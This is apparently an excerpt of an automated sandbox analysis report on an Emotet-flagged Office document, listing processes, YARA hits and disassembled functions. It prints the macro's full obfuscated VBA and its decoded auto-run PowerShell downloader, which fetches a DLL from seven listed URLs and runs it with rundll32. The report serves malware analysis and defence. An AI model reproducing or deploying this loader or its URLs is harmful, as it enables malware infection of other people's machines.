Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 2968 Parent PID: 7060

General

Start time:	11:02:48
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL
Imagebase:	0xe00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: svchost.exe PID: 5864 Parent PID: 556

General

Start time:	11:02:49
Start date:	22/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 3900 Parent PID: 556

General

Start time:	11:02:59
Start date:	22/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 2264 Parent PID: 556

General

Start time:	11:03:16
Start date:	22/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: bvkaeiku2ncoi2uho3ihdes

Declaration

Line	Content
1	Attribute VB_Name = "bvkaeiku2ncoi2uho3ihdes"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, APIs: 3, Strings: 6, Number of lines: 12, Relevance: 34.012

APIs	Meta Information
CreateObject	CreateObject("Wscript.Shell")
Replace	Replace("DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj="$DaIstDaIrs=\"hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\".SDaIplDaIit(\"DaI,DaI\");fDaIoDaIreacDaIh($DaIst iDaIn $DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\"DaICDaI:DaI\PDaIroDaIgramDDaIata\\\"+DaI$rDaI1+\".DaIdDaIll\"DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\"DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\";$DaIa=DaI$tDaIptDaIh+DaI\",DaIf\"+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};";DaIIEXDaI $dDaIfkj","DaI","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Run	IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

Strings	Decrypted Strings
"DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj=""$DaIstDaIrs=\""hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\"".SDaIplDaIit(\""DaI,DaI\"");fDaIoDaIreacDaIh($DaIst iDaIn "
"Wsc"
""""
"DaI"
""""
"DaI"

Line	Instruction	Meta Information
53	Sub dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf(nfkl34 as String, ndr54 as Long, bvret as Long)
54	Dim s1, s2, ra, glew, hkqwfsadesf, st as String	executed
55	Dim d, R as Double
56	s2 = "DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj=""$DaIstDaIrs=\""hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\"".SDaIplDaIit(\""DaI,DaI\"");fDaIoDaIreacDaIh($DaIst iDaIn "
57	Dim fs as Integer
58	Set service = CreateObject("Wsc" + s1 + "ript.She" & "ll")	CreateObject("Wscript.Shell") executed
59	s2 = s2 + "$DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\""DaICDaI:DaI\PDaIroDaIgramDDaIata\\\""+DaI$rDaI1+\"".DaIdDaIll\""DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\""DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\"";$DaIa=DaI$tDaIptDaIh+DaI\"",DaIf\""+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};"";DaIIEXDaI $dDaIfkj"
60	If d <> 0.123456 Then
61	ra = Replace(s2, "DaI", "")	Replace("DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj="$DaIstDaIrs=\"hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\".SDaIplDaIit(\"DaI,DaI\");fDaIoDaIreacDaIh($DaIst iDaIn $DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\"DaICDaI:DaI\PDaIroDaIgramDDaIata\\\"+DaI$rDaI1+\".DaIdDaIll\"DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\"DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\";$DaIa=DaI$tDaIptDaIh+DaI\",DaIf\"+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};";DaIIEXDaI $dDaIfkj","DaI","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj executed
62	Endif
63	service.Run ra, 0	IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0 executed
64	End Sub

Subroutine Document_Open, APIs: 5, Strings: 4, Number of lines: 8, Relevance: 17.508

APIs	Meta Information
Part of subcall function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf@bvkaeiku2ncoi2uho3ihdes: CreateObject
Part of subcall function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf@bvkaeiku2ncoi2uho3ihdes: Replace
Part of subcall function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf@bvkaeiku2ncoi2uho3ihdes: Run
fojn
MsgBox

Strings	Decrypted Strings
"sd"
"afqowihro3ihoqew df"
"gks; kr4;"
"gks; kr4;"

Line	Instruction	Meta Information
70	Private Sub Document_Open()
71	Dim dfjrqlwihjpqwof as String	executed
72	dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf "sd", 0, 0
73	If fojn = "afqowihro3ihoqew df" Then	fojn
74	fjl = "gks; kr4;"
75	MsgBox fjl	MsgBox
76	Endif
77	End Sub

Non-Executed Functions

Subroutine tgkauegriu3gkaiusdgfaig3eirgaoiw3rgfoaisdgefig, APIs: 43, Strings: 25, Number of lines: 46, Relevance: 102.046

APIs	Meta Information
Clear
GetFolder
MsgBox
vbCritical
GetFolder
MsgBox
vbCritical
FilenamesCollection
Count
MsgBox
vbNewLine
vbExclamation
ProgressIndicator
Show
StartNewAction
Count
ScreenUpdating
SubAction
Dir
Log
Dir
Open
Log
vbTab
Worksheets
Range
End
xlUp
Resize
Rows
Transpose
Value
Close
DoEvents
Log
vbTab
Dir
vbNormal
Hide
DoEvents
ScreenUpdating
MsgBox
vbInformation

Strings	Decrypted Strings
"(look)"
""""
""""
","
""""
","
","
"?????? ???.xls*"
""""
""""
""""
"$index $count"
"$time"
":"
"a"
"b"
"b1"
"$index $count"
"$time"
":"
":"
"b"
"b1"
"a"
""""

Line	Instruction	Meta Information
9	Sub tgkauegriu3gkaiusdgfaig3eirgaoiw3rgfoaisdgefig()
10	On Error Resume Next
10	Err.Clear	Clear
11	InvoiceFolder$ = GetFolder(1, , "(look)")	GetFolder
12	If InvoiceFolder$ = "" Then
12	MsgBox "", vbCritical, ""	MsgBox vbCritical
12	Exit Sub
12	Endif
13	ArchieveFolder$ = GetFolder(2, , ",")	GetFolder
14	If ArchieveFolder$ = "" Then
14	MsgBox ",", vbCritical, ","	MsgBox vbCritical
14	Exit Sub
14	Endif
15	Dim coll as Collection
16	Set coll = FilenamesCollection(InvoiceFolder$, "?????? ???.xls*", 1)	FilenamesCollection
17	If coll.Count = 0 Then	Count
18	MsgBox "" & vbNewLine & InvoiceFolder$, vbExclamation, ""	MsgBox vbNewLine vbExclamation
19	Exit Sub
20	Endif
21	Dim pi as New ProgressIndicator	ProgressIndicator
21	pi.Show "", , 2	Show
22	pi.StartNewAction , , , , , coll.Count	StartNewAction Count
23	Dim WB as Workbook, sh as Worksheet, ra as Range
24	Application.ScreenUpdating = False	ScreenUpdating
25	For Each FileName in coll
26	pi.SubAction "$index $count", ":" & Dir(FileName), "$time"	SubAction Dir
27	pi.Log ":" & Dir(FileName)	Log Dir
28	Set WB = Nothing
28	Set WB = Workbooks.Open(FileName, False, True)	Open
29	If WB Is Nothing Then
30	pi.Log vbTab & "."	Log vbTab
31	Else
32	Set sh = WB.Worksheets(1)	Worksheets
33	Set ra = sh.Range(sh.Range("b1"), sh.Range("b" & sh.Rows.Count).End(xlUp))	Range End xlUp
34	shb.Range("a" & shb.Rows.Count).End(xlUp).Offset(1).Resize( , ra.Rows.Count).Value = Application.WorksheetFunction.Transpose(ra.Value)	Resize Rows Transpose Value
36	WB.Close False	Close
36	DoEvents	DoEvents
37	pi.Log vbTab & "."	Log vbTab
38	Name FileName As ArchieveFolder$ & Dir(FileName, vbNormal)	Dir vbNormal
39	Endif
40	Next
41	pi.Hide	Hide
41	DoEvents	DoEvents
41	Application.ScreenUpdating = True	ScreenUpdating
42	MsgBox "", vbInformation	MsgBox vbInformation
43	End Sub

Function bcbcmbvbvch3h2yg3u5i4tyirugiu, APIs: 20, Strings: 10, Number of lines: 32, Relevance: 45.032

APIs	Meta Information
Clear
IIf
Len
PROJECT_NAME$
GetSetting
Name
Application
Len
Dir
vbDirectory
Len
Dir
vbDirectory
Path
ThisWorkbook
Title
Right$
SaveSetting
Name
Application

Strings	Decrypted Strings
","
""""
"folder"
""""
""""
""""
""""
""""
"\"
"folder"

Line	Instruction	Meta Information
81	Function bcbcmbvbvch3h2yg3u5i4tyirugiu(optional ByVal FolderIndex& = 0, optional ByVal ShowDialog as Boolean = False, optional ByVal Title$ = "", optional ByVal InitialFolder$) as String
82	On Error Resume Next
82	Err.Clear	Clear
83	ProjectName$ = IIf(Len(PROJECT_NAME$) > 0, PROJECT_NAME$, ",")	IIf Len PROJECT_NAME$
84	PreviousFolder$ = GetSetting(Application.Name, ProjectName$, "folder" & FolderIndex&, "")	GetSetting Name Application
85	If Len(PreviousFolder$) > 0 And Not ShowDialog Then	Len
86	If Dir(PreviousFolder$, vbDirectory) <> "" Then	Dir vbDirectory
86	GetFolder = PreviousFolder$
86	Exit Function
86	Endif
87	Endif
88	If InitialFolder$ = "" Then
89	If Len(PreviousFolder$) > 0 And Dir(PreviousFolder$, vbDirectory) <> "" Then	Len Dir vbDirectory
90	InitialFolder$ = PreviousFolder$
91	Else
92	InitialFolder$ = ThisWorkbook.Path & "\"	Path ThisWorkbook
93	Endif
94	Endif
95	With Application.FileDialog(msoFileDialogFolderPicker)
96	. ButtonName = ""
96	. Title = Title	Title
96	. InitialFileName = InitialFolder$
97	If . Show <> - 1 Then
97	Exit Function
97	Endif
98	GetFolder = . SelectedItems(1)
99	If Not Right$(GetFolder, 1) = "\" Then	Right$
99	GetFolder = GetFolder & "\"
99	Endif
100	SaveSetting Application.Name, ProjectName$, "folder" & FolderIndex&, GetFolder	SaveSetting Name Application
101	End With
102	End Function

Subroutine gdekkefh32yeyf8tasf8gqw8dgfiaxdbaflpo3pt23hf, APIs: 4, Strings: 5, Number of lines: 16, Relevance: 13.516

APIs	Meta Information
Clear
GetFolder
GetFolder
GetFolder

Strings	Decrypted Strings
""""
""""
""""
""""
""""

Line	Instruction	Meta Information
44	Sub gdekkefh32yeyf8tasf8gqw8dgfiaxdbaflpo3pt23hf()
45	On Error Resume Next
45	Err.Clear	Clear
46	folder_1$ = GetFolder(1, , "")	GetFolder
47	If folder_1$ = "" Then
47	Exit Sub
47	Endif
48	folder_2$ = GetFolder(2, , , folder_1$)	GetFolder
49	If folder_2$ = "" Then
49	Exit Sub
49	Endif
50	folder_3$ = GetFolder( , True, "")	GetFolder
51	If folder_3$ = "" Then
51	Exit Sub
51	Endif
52	End Sub

Subroutine fhowi34hotaildovgjuspozao3ethao4wthihegf, APIs: 3, Strings: 2, Number of lines: 7, Relevance: 7.507

APIs	Meta Information
GetFolder
MsgBox
vbInformation

Strings	Decrypted Strings
""""
":"

Line	Instruction	Meta Information
65	Sub fhowi34hotaildovgjuspozao3ethao4wthihegf()
66	folder$ = GetFolder()	GetFolder
67	If folder$ = "" Then
67	Exit Sub
67	Endif
68	MsgBox ":" & folder$, vbInformation	MsgBox vbInformation
69	End Sub

Subroutine dgfhoswihetaoihegaosoaihcbi, APIs: 1, Strings: 0, Number of lines: 4, Relevance: 1.254

APIs	Meta Information
GetFolder

Line	Instruction	Meta Information
78	Sub dgfhoswihetaoihegaosoaihcbi()
79	On Error Resume Next
79	GetFolder , True	GetFolder
80	End Sub

Reset < >

Analysis Process: powershell.exe PID: 6468 Parent PID: 6324 powershell.exeCOMMON

Executed Functions

Function 046EE760, Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.339537924.00000000046E0000.00000040.00000001.sdmp, Offset: 046E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_46e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b6b09ac4720655defc211f9aabe7182e66edfd0ed3beaacbf1967602287a5f
Instruction ID: 7f26dbac2accbc3f71af48632aa70f0f7d23df0bc6caca1777207bf2239a19fd
Opcode Fuzzy Hash: 03b6b09ac4720655defc211f9aabe7182e66edfd0ed3beaacbf1967602287a5f
Instruction Fuzzy Hash: C1A16D706012058FEB19DF26C498B7ABBE2BF88304F14846DD4469B3A1DB75ED82DB80

Uniqueness

Uniqueness Score: -1.00%

Function 046ECB20, Relevance: 1.6, APIs: 1, Instructions: 116fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,?,?,?,?,?), ref: 046ECC4A

Memory Dump Source

Source File: 00000005.00000002.339537924.00000000046E0000.00000040.00000001.sdmp, Offset: 046E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_46e0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4ddd49647a4b91f4de71bfd980da85954f13620ec485a8d71e006043e504f016
Instruction ID: 8b8e8e1b0340ea4416b28efa0ca3a3c5478c625d40c44eeb9c5bbf42c401066e
Opcode Fuzzy Hash: 4ddd49647a4b91f4de71bfd980da85954f13620ec485a8d71e006043e504f016
Instruction Fuzzy Hash: 1141AF71A002199FDB00CFA9D844BAEFBF5FB48714F14816AE909AB381D774A940CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 046ECBC0, Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,?,?,?,?,?), ref: 046ECC4A

Memory Dump Source

Source File: 00000005.00000002.339537924.00000000046E0000.00000040.00000001.sdmp, Offset: 046E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_46e0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ad2b9495b6d8d6affbff0e3f9fd776db891ac318668c27c124f6546173e2144d
Instruction ID: 4c409cf498ca97d935c1b388a717007b53e8c50b1c8de2788f552176558c96a7
Opcode Fuzzy Hash: ad2b9495b6d8d6affbff0e3f9fd776db891ac318668c27c124f6546173e2144d
Instruction Fuzzy Hash: F52125B5D00619DFCB00CF9AD580AEEFBB4FF08714F14811AE919A7210D774A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 044ED006, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.339120596.00000000044ED000.00000040.00000001.sdmp, Offset: 044ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_44ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ef159c192503c63d117eaff1b6faf5c8e74ddb24db4fa04ca5e47b69ba96a7
Instruction ID: 714f0ea91972f5a304d29752bb3c8be0c0e03f098f278d907cb4f382d6cdecb5
Opcode Fuzzy Hash: 19ef159c192503c63d117eaff1b6faf5c8e74ddb24db4fa04ca5e47b69ba96a7
Instruction Fuzzy Hash: 58011E6140D3C49FD7128B259C94B62BFB4EF43628F1D81DBD9889F2A3C2695849C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 044ED01D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.339120596.00000000044ED000.00000040.00000001.sdmp, Offset: 044ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_44ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40ddae5d044ceac1878bc58d992b3350403a4a8a6e9d6c9369134f062a2cf432
Instruction ID: b10f614f32d6ee674566be26dc501b54ddf4b00558fd93758ddc7dcc3413bb6e
Opcode Fuzzy Hash: 40ddae5d044ceac1878bc58d992b3350403a4a8a6e9d6c9369134f062a2cf432
Instruction Fuzzy Hash: D301F7B1908345AADB204F26EC84B77FB88EF4126DF1C855BEC041B282D379A845C6B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 046ECF60, Relevance: 6.3, Strings: 4, Instructions: 1292COMMON

Download Yara Rule

Strings

t%-d, xrefs: 046ED204
\,d, xrefs: 046ED150
D!-d, xrefs: 046ED23E
T:1d, xrefs: 046EDB12

Memory Dump Source

Source File: 00000005.00000002.339537924.00000000046E0000.00000040.00000001.sdmp, Offset: 046E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_46e0000_powershell.jbxd

Similarity

API ID:
String ID: D!-d$T:1d$\,d$t%-d
API String ID: 0-1576052806
Opcode ID: 8c270121c3fe380a047e3dcdd452ff25bde9c76c07f8d7f083959942f413ad9b
Instruction ID: 82b0b1eae9ce71e446024e7deac60100e835f1967c7e5028cf4883062c08d06b
Opcode Fuzzy Hash: 8c270121c3fe380a047e3dcdd452ff25bde9c76c07f8d7f083959942f413ad9b
Instruction Fuzzy Hash: 77A2A07070020C9BEB65AFB2DC517AF79ABABC4708F2481ADD4465B386CF725D814BD2

Uniqueness

Uniqueness Score: -1.00%

Function 046ECF70, Relevance: 6.3, Strings: 4, Instructions: 1287COMMON

Download Yara Rule

Strings

t%-d, xrefs: 046ED204
\,d, xrefs: 046ED150
D!-d, xrefs: 046ED23E
T:1d, xrefs: 046EDB12

Memory Dump Source

Source File: 00000005.00000002.339537924.00000000046E0000.00000040.00000001.sdmp, Offset: 046E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_46e0000_powershell.jbxd

Similarity

API ID:
String ID: D!-d$T:1d$\,d$t%-d
API String ID: 0-1576052806
Opcode ID: d6b3455399b65f788110339c441f1f583338b5ad3fa5c498a6696dc781fddfcc
Instruction ID: 7cb55fda478cfdf87daf9c0e667af62321d705c4c607f6e1080c2885a0d196e8
Opcode Fuzzy Hash: d6b3455399b65f788110339c441f1f583338b5ad3fa5c498a6696dc781fddfcc
Instruction Fuzzy Hash: B9A2AF7070020C9BEB69AFB2DC517AF79ABABC4708F2481ADD4465B385CF725D814BD2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4896 Parent PID: 6468 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.9%
Total number of Nodes:	446
Total number of Limit Nodes:	29

Executed Functions

Function 615A6620, Relevance: 80.7, APIs: 44, Strings: 1, Instructions: 1995
COMMONCrypto

Download Yara Rule

